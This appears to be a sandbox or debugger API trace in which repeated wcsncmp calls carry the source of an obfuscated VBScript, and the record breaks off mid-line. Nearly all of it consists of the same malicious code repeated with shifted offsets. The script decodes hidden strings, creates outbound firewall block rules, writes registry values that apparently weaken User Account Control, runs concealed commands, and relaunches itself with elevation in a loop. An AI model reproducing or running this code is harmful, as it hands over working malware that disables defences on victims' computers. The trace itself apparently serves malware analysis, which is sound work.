bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 87 [0226.321] wcsncmp (_String1="im rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 92 [0226.321] wcsncmp (_String1="m rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 96 [0226.321] wcsncmp (_String1=" rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0226.322] wcsncmp (_String1="rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 101 [0226.322] wcsncmp (_String1="ule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = 